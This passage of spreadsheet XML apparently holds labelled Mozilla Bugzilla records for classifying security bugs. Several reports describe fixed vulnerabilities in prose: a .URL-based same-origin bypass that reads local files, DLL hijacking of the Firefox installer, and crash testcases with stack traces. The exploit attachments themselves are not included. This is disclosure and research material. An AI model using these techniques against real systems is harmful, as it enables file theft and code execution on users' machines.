      <c r="H1860" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1860" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1860" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K1860" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1860" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1860" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1860" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1860" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1860" t="inlineStr">
        <is>
          <t>[adv-main24+]</t>
        </is>
      </c>
      <c r="Q1860" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1860" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1860" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T1860" t="n">
        <v>1</v>
      </c>
      <c r="U1860" t="n">
        <v>0</v>
      </c>
      <c r="V1860" t="n">
        <v>10</v>
      </c>
      <c r="W1860" t="inlineStr">
        <is>
          <t>Created attachment 775293
testcase (crashes Firefox when loaded)
bp-3956aca3-ec88-4820-8830-a6f392130714</t>
        </is>
      </c>
      <c r="X1860" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1861">
      <c r="A1861" t="n">
        <v>637621</v>
      </c>
      <c r="B1861" t="inlineStr">
        <is>
          <t>2011-03-01 04:12:43 -0800</t>
        </is>
      </c>
      <c r="C1861" t="inlineStr">
        <is>
          <t>Crash [@ nsRange::IsValidBoundary] after selected node is GCed</t>
        </is>
      </c>
      <c r="D1861" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:52 -0700</t>
        </is>
      </c>
      <c r="E1861" t="n">
        <v>1</v>
      </c>
      <c r="F1861" t="n">
        <v>1</v>
      </c>
      <c r="G1861" t="n">
        <v>3</v>
      </c>
      <c r="H1861" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1861" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1861" t="inlineStr">
        <is>
          <t>DOM: Selection</t>
        </is>
      </c>
      <c r="K1861" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1861" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1861" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1861" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1861" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1861" t="inlineStr">
        <is>
          <t>[sg:critical?][has patch]</t>
        </is>
      </c>
      <c r="Q1861" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1861" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1861" t="inlineStr">
        <is>
          <t>mozilla2.0</t>
        </is>
      </c>
      <c r="T1861" t="n">
        <v>1</v>
      </c>
      <c r="U1861" t="n">
        <v>0</v>
      </c>
      <c r="V1861" t="n">
        <v>16</v>
      </c>
      <c r="W1861" t="inlineStr">
        <is>
          <t>Created attachment 515877
testcase (requires extension for GC)
1. Install 'DOM Fuzz Lite' from
    https://www.squarefree.com/extensions/domFuzzLite.xpi
2. Load the testcase.
Crash [@ nsRange::IsValidBoundary]
http://hg.mozilla.org/mozilla-central/file/410519307e63/content/base/src/nsRange.cpp#l598 is the crashing line</t>
        </is>
      </c>
      <c r="X1861" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1862">
      <c r="A1862" t="n">
        <v>1397530</v>
      </c>
      <c r="B1862" t="inlineStr">
        <is>
          <t>2017-09-06 16:36:24 -0700</t>
        </is>
      </c>
      <c r="C1862" t="inlineStr">
        <is>
          <t>pollEmailStatus swallows exceptions checking the account state</t>
        </is>
      </c>
      <c r="D1862" t="inlineStr">
        <is>
          <t>2017-11-21 13:58:17 -0800</t>
        </is>
      </c>
      <c r="E1862" t="n">
        <v>1</v>
      </c>
      <c r="F1862" t="n">
        <v>1</v>
      </c>
      <c r="G1862" t="n">
        <v>2</v>
      </c>
      <c r="H1862" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1862" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1862" t="inlineStr">
        <is>
          <t>Firefox Accounts</t>
        </is>
      </c>
      <c r="K1862" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1862" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1862" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1862" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1862" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1862" t="inlineStr"/>
      <c r="Q1862" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1862" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1862" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T1862" t="n">
        <v>1</v>
      </c>
      <c r="U1862" t="n">
        <v>0</v>
      </c>
      <c r="V1862" t="n">
        <v>5</v>
      </c>
      <c r="W1862" t="inlineStr">
        <is>
          <t>Due to some other reason I'm still tracking down, we were attempting to check our email status when we didn't have a session token. The exception caused by this wasn't reported anywhere.</t>
        </is>
      </c>
      <c r="X1862" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1863">
      <c r="A1863" t="n">
        <v>598509</v>
      </c>
      <c r="B1863" t="inlineStr">
        <is>
          <t>2010-09-21 17:06:15 -0700</t>
        </is>
      </c>
      <c r="C1863" t="inlineStr">
        <is>
          <t>Requesting try test run</t>
        </is>
      </c>
      <c r="D1863" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1863" t="n">
        <v>1</v>
      </c>
      <c r="F1863" t="n">
        <v>1</v>
      </c>
      <c r="G1863" t="n">
        <v>5</v>
      </c>
      <c r="H1863" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1863" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1863" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1863" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1863" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1863" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1863" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1863" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1863" t="inlineStr">
        <is>
          <t>tryrequest</t>
        </is>
      </c>
      <c r="Q1863" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1863" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1863" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1863" t="n">
        <v>1</v>
      </c>
      <c r="U1863" t="n">
        <v>0</v>
      </c>
      <c r="V1863" t="n">
        <v>2</v>
      </c>
      <c r="W1863" t="inlineStr">
        <is>
          <t>Please re-run 21058b5fb974 Windows debug Moth.
Thanks!</t>
        </is>
      </c>
      <c r="X1863" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1864">
      <c r="A1864" t="n">
        <v>1278013</v>
      </c>
      <c r="B1864" t="inlineStr">
        <is>
          <t>2016-06-03 18:06:30 -0700</t>
        </is>
      </c>
      <c r="C1864" t="inlineStr">
        <is>
          <t>Same origin policy bypass in local document/Universal xss</t>
        </is>
      </c>
      <c r="D1864" t="inlineStr">
        <is>
          <t>2024-05-30 09:17:59 -0700</t>
        </is>
      </c>
      <c r="E1864" t="n">
        <v>1</v>
      </c>
      <c r="F1864" t="n">
        <v>1</v>
      </c>
      <c r="G1864" t="n">
        <v>3</v>
      </c>
      <c r="H1864" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1864" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1864" t="inlineStr">
        <is>
          <t>Networking: File</t>
        </is>
      </c>
      <c r="K1864" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L1864" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1864" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1864" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1864" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1864" t="inlineStr">
        <is>
          <t>[adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q1864" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1864" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1864" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T1864" t="n">
        <v>1</v>
      </c>
      <c r="U1864" t="n">
        <v>0</v>
      </c>
      <c r="V1864" t="n">
        <v>58</v>
      </c>
      <c r="W1864" t="inlineStr">
        <is>
          <t>Created attachment 8759911
bypass.zip
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Steps to reproduce:
This only works on local HTML files that have been extracted into a folder, a specially crafted .URL needs to be in the same folder as the locally executed HTML document. User interaction is required (a click)
I have attached a zip file which contains the PoC code, please extract both files into the same folder and open 'PoC.html' _locally_
Additionally, you should create a new file (and folder) located at 'C:/secret/secret.txt' 
Open the PoC file and you should see two anchor tag, one uses the .url bypass another doesnt. This is to clearly show there is a bypass.
On top of that, if we change the target file to a folder like 'C:/secret/' we will be able to read the list of files.
Works on FF-ESR 45.1.1 &amp;&amp; Nightly 49.0a1 (2016-06-03)
I have not played with this much yet, so I'm not sure if more dangerous bypasses or other bugs could be performed using the .URL redirects. Will test more.
Actual results:
Using a .URL file as a redirector, it seems like it breaks the SOP protection. 
Expected results:
I believe local HTML files are only allowed to read files within the same folder the html file has been opened in. What ever protection mechanism exists needs to keep the .url file in mind and block the ability to read arbitrary files.</t>
        </is>
      </c>
      <c r="X1864" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1865">
      <c r="A1865" t="n">
        <v>1438593</v>
      </c>
      <c r="B1865" t="inlineStr">
        <is>
          <t>2018-02-15 10:01:37 -0800</t>
        </is>
      </c>
      <c r="C1865" t="inlineStr">
        <is>
          <t>Release notes for Bugzilla 5.0.4</t>
        </is>
      </c>
      <c r="D1865" t="inlineStr">
        <is>
          <t>2018-05-15 01:04:15 -0700</t>
        </is>
      </c>
      <c r="E1865" t="n">
        <v>1</v>
      </c>
      <c r="F1865" t="n">
        <v>1</v>
      </c>
      <c r="G1865" t="n">
        <v>4</v>
      </c>
      <c r="H1865" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1865" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1865" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K1865" t="inlineStr">
        <is>
          <t>5.0.3</t>
        </is>
      </c>
      <c r="L1865" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1865" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1865" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1865" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1865" t="inlineStr"/>
      <c r="Q1865" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1865" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1865" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1865" t="n">
        <v>1</v>
      </c>
      <c r="U1865" t="n">
        <v>0</v>
      </c>
      <c r="V1865" t="n">
        <v>5</v>
      </c>
      <c r="W1865" t="inlineStr">
        <is>
          <t>Release notes for Bugzilla 5.0.4</t>
        </is>
      </c>
      <c r="X1865" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1866">
      <c r="A1866" t="n">
        <v>1627771</v>
      </c>
      <c r="B1866" t="inlineStr">
        <is>
          <t>2020-04-06 11:55:53 -0700</t>
        </is>
      </c>
      <c r="C1866" t="inlineStr">
        <is>
          <t>Transition Plan - Mat Leave</t>
        </is>
      </c>
      <c r="D1866" t="inlineStr">
        <is>
          <t>2020-05-12 07:01:11 -0700</t>
        </is>
      </c>
      <c r="E1866" t="n">
        <v>1</v>
      </c>
      <c r="F1866" t="n">
        <v>1</v>
      </c>
      <c r="G1866" t="n">
        <v>5</v>
      </c>
      <c r="H1866" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1866" t="inlineStr">
        <is>
          <t>User Research</t>
        </is>
      </c>
      <c r="J1866" t="inlineStr">
        <is>
          <t>Project Request</t>
        </is>
      </c>
      <c r="K1866" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1866" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1866" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1866" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1866" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1866" t="inlineStr"/>
      <c r="Q1866" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1866" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1866" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1866" t="n">
        <v>1</v>
      </c>
      <c r="U1866" t="n">
        <v>0</v>
      </c>
      <c r="V1866" t="n">
        <v>2</v>
      </c>
      <c r="W1866" t="inlineStr">
        <is>
          <t>**Request Description** 
(What question are you trying to answer?)
Transition documents for the UR team, contractor, and my stakeholders. 
**Deadline** 
(Is there a specific date you need the results by? FYI - We may not be able to meet this deadline.) 
Hope to have this completed by the week of May 4. (week 37)
**Priority Level** 
(1 = High 2 = Medium, 3 = Low):
1
**Priority Level Description** 
(Please provide information on how you chose the priority level above, which product management OKR(s) this work supports, or any other details that will help us triage and prioritize this request.) 
**Supporting Information**
(Links to any assets or previous research relevant to this project.)</t>
        </is>
      </c>
      <c r="X1866" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1867">
      <c r="A1867" t="n">
        <v>589765</v>
      </c>
      <c r="B1867" t="inlineStr">
        <is>
          <t>2010-08-23 04:41:44 -0700</t>
        </is>
      </c>
      <c r="C1867" t="inlineStr">
        <is>
          <t>l10n changes merge across locales</t>
        </is>
      </c>
      <c r="D1867" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1867" t="n">
        <v>1</v>
      </c>
      <c r="F1867" t="n">
        <v>1</v>
      </c>
      <c r="G1867" t="n">
        <v>5</v>
      </c>
      <c r="H1867" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1867" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1867" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1867" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1867" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1867" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1867" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1867" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1867" t="inlineStr">
        <is>
          <t>[l10n]</t>
        </is>
      </c>
      <c r="Q1867" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1867" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1867" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1867" t="n">
        <v>1</v>
      </c>
      <c r="U1867" t="n">
        <v>0</v>
      </c>
      <c r="V1867" t="n">
        <v>11</v>
      </c>
      <c r="W1867" t="inlineStr">
        <is>
          <t>I've landed 8 new locales, all in one go in mozilla-central, and then pushed all 8 repos. Sadly, only nso and son got builds.
Nick checked the db a bit, and there are at least, quote
nthomas: so for nso rev 6142644b5b0 and en-ZA aa8d04e439 I see a row each in the changes table, but it's mapped into a single sourcestamp &amp; buildset
nthomas: since nso came slightly later that was what was built
The pushes are on https://l10n-stage-sj.mozilla.org/pushes/l10n-central/?from=1282552557&amp;until=1282557510, new locales are ak, br, bs, en-ZA, hy-AM, lg, nso, son, pushed in http://hg.mozilla.org/mozilla-central/rev/19ef853ea57c</t>
        </is>
      </c>
      <c r="X1867" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1868">
      <c r="A1868" t="n">
        <v>1380597</v>
      </c>
      <c r="B1868" t="inlineStr">
        <is>
          <t>2017-07-13 02:43:16 -0700</t>
        </is>
      </c>
      <c r="C1868" t="inlineStr">
        <is>
          <t>sidebarAction.setPopup is missing a URL security check</t>
        </is>
      </c>
      <c r="D1868" t="inlineStr">
        <is>
          <t>2018-06-19 13:04:03 -0700</t>
        </is>
      </c>
      <c r="E1868" t="n">
        <v>1</v>
      </c>
      <c r="F1868" t="n">
        <v>1</v>
      </c>
      <c r="G1868" t="n">
        <v>3</v>
      </c>
      <c r="H1868" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1868" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J1868" t="inlineStr">
        <is>
          <t>Frontend</t>
        </is>
      </c>
      <c r="K1868" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1868" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1868" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1868" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1868" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1868" t="inlineStr">
        <is>
          <t>[adv-main56+][post-critsmash-triage] triaged</t>
        </is>
      </c>
      <c r="Q1868" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1868" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1868" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T1868" t="n">
        <v>1</v>
      </c>
      <c r="U1868" t="n">
        <v>0</v>
      </c>
      <c r="V1868" t="n">
        <v>19</v>
      </c>
      <c r="W1868" t="inlineStr">
        <is>
          <t>It used to be possible for extensions to load privileged about: pages in the sidebar with browser.sidebarAction.setPanel but now with OOP enabled they fail to load with the following errors:
"Error: You cannot use the AddonManager in child processes!"
"Use of nsIFile in content process is deprecated."</t>
        </is>
      </c>
      <c r="X1868" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1869">
      <c r="A1869" t="n">
        <v>792106</v>
      </c>
      <c r="B1869" t="inlineStr">
        <is>
          <t>2012-09-18 10:33:22 -0700</t>
        </is>
      </c>
      <c r="C1869" t="inlineStr">
        <is>
          <t>DLL Hijacking - Firefox installer</t>
        </is>
      </c>
      <c r="D1869" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:14 -0700</t>
        </is>
      </c>
      <c r="E1869" t="n">
        <v>1</v>
      </c>
      <c r="F1869" t="n">
        <v>1</v>
      </c>
      <c r="G1869" t="n">
        <v>2</v>
      </c>
      <c r="H1869" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1869" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1869" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K1869" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1869" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1869" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1869" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1869" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1869" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+][adv-esr10+]</t>
        </is>
      </c>
      <c r="Q1869" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1869" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1869" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T1869" t="n">
        <v>1</v>
      </c>
      <c r="U1869" t="n">
        <v>0</v>
      </c>
      <c r="V1869" t="n">
        <v>186</v>
      </c>
      <c r="W1869" t="inlineStr">
        <is>
          <t>Created attachment 662213
trojan DLL loads cmd.exe
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1
Build ID: 20120905151427
Steps to reproduce:
I downloaded the current Firefox installer in the Windows downloads directory. 
C:\Users\User\Downloads
Then I put a trojan dwmapi.dll in the same directory.
Actual results:
If a user wants to install the Firefox browser, the setup loads the trojan dll with administrative privileges.
As described here http://seclists.org/fulldisclosure/2012/Aug/134 , you can compromise the victim with a social engineering attack like this.
Expected results:
The installer should not load the trojan dll.</t>
        </is>
      </c>
      <c r="X1869" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1870">
      <c r="A1870" t="n">
        <v>501934</v>
      </c>
      <c r="B1870" t="inlineStr">
        <is>
          <t>2009-07-02 05:23:43 -0700</t>
        </is>
      </c>
      <c r="C1870" t="inlineStr">
        <is>
          <t>Crash [@ nsXBLBinding::GenerateAnonymousContent] with DOMAttrModified and oncommand removing element and xbl:inherits="xbl:text"</t>
        </is>
      </c>
      <c r="D1870" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E1870" t="n">
        <v>1</v>
      </c>
      <c r="F1870" t="n">
        <v>1</v>
      </c>
      <c r="G1870" t="n">
        <v>3</v>
      </c>
      <c r="H1870" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1870" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1870" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K1870" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1870" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1870" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1870" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1870" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1870" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1870" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1870" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1870" t="inlineStr">
        <is>
          <t>mozilla1.9.2</t>
        </is>
      </c>
      <c r="T1870" t="n">
        <v>1</v>
      </c>
      <c r="U1870" t="n">
        <v>0</v>
      </c>
      <c r="V1870" t="n">
        <v>37</v>
      </c>
      <c r="W1870" t="inlineStr">
        <is>
          <t>Created attachment 386497
testcase
See testcase, which crashes current trunk build and Firefox 3 after 100ms.
http://crash-stats.mozilla.com/report/index/b25ff7b7-dfdb-4b4e-b896-312272090702?p=1
0  	xul.dll  	xul.dll@0x421a98  	
1 	xul.dll 	nsBaseHashtable&lt;nsISupportsHashKey,nsCSSFrameConstructor::RestyleData,nsCSSFrameConstructor::RestyleData&gt;::s_EnumStub 	obj-firefox/dist/include/nsBaseHashtable.h:346
2 	xul.dll 	PL_DHashTableEnumerate 	obj-firefox/xpcom/build/pldhash.c:754
3 	xul.dll 	nsXBLBinding::GenerateAnonymousContent 	content/xbl/src/nsXBLBinding.cpp:794
4 	xul.dll 	nsXBLService::LoadBindings 	content/xbl/src/nsXBLService.cpp:664
5 	xul.dll 	nsElementSH::PostCreate 	dom/base/nsDOMClassInfo.cpp:7620
6 	xul.dll 	XPCWrappedNative::GetNewOrUsed 	js/src/xpconnect/src/xpcwrappednative.cpp:599
Firefox 3 crash report:
http://crash-stats.mozilla.com/report/index/aae1cfba-71ac-4698-b21c-6100c2090702?p=1
0  	xul.dll  	nsCOMPtr&lt;nsIRDFNode&gt;::operator=  	 nsCOMPtr.h:713
1 	xul.dll 	RealizeDefaultContent 	mozilla/content/xbl/src/nsXBLBinding.cpp:548
2 	xul.dll 	nsBaseHashtable&lt;nsURIHashKey,CacheScriptEntry,CacheScriptEntry&gt;::s_EnumStub 	nsBaseHashtable.h:346
3 	xul.dll 	PL_DHashTableEnumerate 	pldhash.c:724
4 	xul.dll 	nsXBLBinding::GenerateAnonymousContent 	mozilla/content/xbl/src/nsXBLBinding.cpp:775
5 	xul.dll 	nsXBLService::LoadBindings 	mozilla/content/xbl/src/nsXBLService.cpp:635
6 	xul.dll 	nsElementSH::PostCreate 	mozilla/dom/src/base/nsDOMClassInfo.cpp:7236
7 	xul.dll 	XPCWrappedNative::GetNewOrUsed 	mozilla/js/src/xpconnect/src/xpcwrappednative.cpp:546
8 	xul.dll 	XPCConvert::NativeInterface2JSObject 	mozilla/js/src/xpconnect/src/xpcconvert.cpp:1107
9 	xul.dll 	XPCConvert::NativeData2JS 	mozilla/js/src/xpconnect/src/xpcconvert.cpp:482
10 	xul.dll 	XPCWrappedNative::CallMethod 	mozilla/js/src/xpconnect/src/xpcwrappednative.cpp:2481
11 	xul.dll 	XPC_WN_CallMethod 	mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp:1473
12 	js3250.dll 	js_Invoke 	mozilla/js/src/jsinterp.c:1310
13 	js3250.dll 	js_Interpret 	mozilla/js/src/jsinterp.c:4883
14 	js3250.dll 	js_Invoke 	mozilla/js/src/jsinterp.c:1326
15 	js3250.dll 	JS_CallFunctionValue 	mozilla/js/src/jsapi.c:5058
16 	xul.dll 	nsJSContext::CallEventHandler 	mozilla/dom/src/base/nsJSEnvironment.cpp:1962
17 	xul.dll 	nsGlobalWindow::RunTimeout 	mozilla/dom/src/base/nsGlobalWindow.cpp:7900
18 	xul.dll 	nsGlobalWindow::TimerCallback 	mozilla/dom/src/base/nsGlobalWindow.cpp:8231
19 	xul.dll 	nsTimerImpl::Fire 	mozilla/xpcom/threads/nsTimerImpl.cpp:400
20 	xul.dll 	nsTimerEvent::Run 	mozilla/xpcom/threads/nsTimerImpl.cpp:490
21 	xul.dll 	nsThread::ProcessNextEvent 	mozilla/xpcom/threads/nsThread.cpp:510
22 	xul.dll 	nsBaseAppShell::Run 	mozilla/widget/src/xpwidgets/nsBaseAppShell.cpp:170
23 	nspr4.dll 	PR_GetEnv 	
24 	firefox.exe 	wmain 	mozilla/toolkit/xre/nsWindowsWMain.cpp:87
25 	firefox.exe 	firefox.exe@0x217f 	
26 	kernel32.dll 	kernel32.dll@0x17076</t>
        </is>
      </c>
      <c r="X1870" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1871">
      <c r="A1871" t="n">
        <v>1415602</v>
      </c>
      <c r="B1871" t="inlineStr">
        <is>
          <t>2017-11-08 09:17:05 -0800</t>
        </is>
      </c>
      <c r="C1871" t="inlineStr">
        <is>
          <t>Core client_count date sanitation should be correct for year boundaries</t>
        </is>
      </c>
      <c r="D1871" t="inlineStr">
        <is>
          <t>2022-07-26 12:19:01 -0700</t>
        </is>
      </c>
      <c r="E1871" t="n">
        <v>1</v>
      </c>
      <c r="F1871" t="n">
        <v>1</v>
      </c>
      <c r="G1871" t="n">
        <v>2</v>
      </c>
      <c r="H1871" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1871" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J1871" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1871" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1871" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1871" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1871" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1871" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1871" t="inlineStr"/>
      <c r="Q1871" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1871" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1871" t="inlineStr">
